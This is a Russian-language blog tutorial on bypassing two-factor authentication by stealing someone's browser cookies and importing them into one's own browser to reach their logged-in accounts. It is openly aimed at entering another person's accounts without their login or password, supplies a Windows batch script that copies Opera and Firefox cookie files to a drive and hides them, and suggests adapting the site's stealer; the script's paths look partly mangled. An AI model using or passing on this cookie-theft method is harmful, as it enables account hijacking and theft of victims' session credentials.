Обход двухфакторной аутентификации с помощью cookies

Обход двухфакторной аутентификации с помощью cookies

Двухфакторная аутентификация – это один из видом многофакторной аутентификации, известна ещё как “двухэтапная верификация” и представляет собой технологию, обеспечивающую идентификацию пользователей с помощью комбинации двух различных компонентов. Как самый понятный пример, можно взять аутентификацию в Google или Steam. Если вы заходите с нового компьютера, то вам помимо логина и пароля нужно ввести шестизначный код подтверждения. Как правило он приходит через SMS или голосовой вызов.
Плюсы двухфакторной аутентификации:

• Защита одноразовым ключом с помощью подтверждения через смартфон;
• Смартфон всегда под рукой, тем самым отсутствует необходимость в дополнительных токенах.

Минусы двухфакторной аутентификации через мобильное устройство:

• Мобильный телефон должен ловить сеть, когда происходит аутентификация, иначе сообщение с паролем просто не дойдет;
• Возможность перехвата сообщения с кодом подтверждения;
• Сообщения приходят с задержкой, время уходит на проверку подлинности;
• Вы делитесь номером, а значит есть возможность, что будет приходить спам.

Обход двухфакторной аутентификации крайне сложный процесс, если работать методом перехвата текстового сообщения может уйти много времени. По этому я расскажу про метод с помощью перехвата, стиллера cookies.
На сайте уже есть статья о стиллере паролей – читать, а также с приложениями для Android, для перехвата трафика, в том числе и cookies – click.

Обход двухфакторной аутентификации с помощью подмены cookies

Существует множество плагинов, позволяющих загрузить свои cookies, скачайте и установите один из них.
Для начала требуется перехватить или украсть cookies у человека, к которому вы хотите зайти не зная логина и пароля. Для этого вы можете воспользоваться одним из приложений или переделать наш портативный стиллер, чтобы он работал с Куки.
Код для кражи cookies с браузеров Opera & Mozilla:
@echo off
md %~d0Mozilla
md %~d0Opera
CD/D %APPDATA%OperaOpera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y cookies.sqlite %~d0Mozilla
ATTRIB -R -A -S -H
attrib +h %~d0Opera
attrib +h %~d0Mozilla
Модифицировать данный код под любой браузер не составит труда, главное найти нужные директории.
После того, как у вас появились нужные cookies, требуется очистить браузер от всех Куки, которые там есть и добавить те, которые вы перехватилиукрали.
Всё, можете проверять сервисы. Если человек был на сайте с двухэтапной аутентификацией, то вам не потребуется ни логина-пароля, ни  кода подтверждения, так как вы сразу попадете на авторизованную страницу.
Данный обход двухэтапной аутентификации имеет ряд минусов:

• Не знаете ни логина, ни пароля;
• Нет возможности изменить пароль или получить резервные коды;
• Не работает с сервисами, требующими подтверждения каждый раз, вне зависимости от того, был ранее совершен вход с устройства или нет.

Обход двухфакторной аутентификации с помощью подмены cookies – это довольно простой и эффективный способ, которым может воспользоваться абсолютно каждый без особых усилий.
Если вам понравилась статья, подписывайтесь на обновление сайта, а также наш Telegram.

Telegram

Подписывайтесь на официальный Telegram канал сайта Make Info.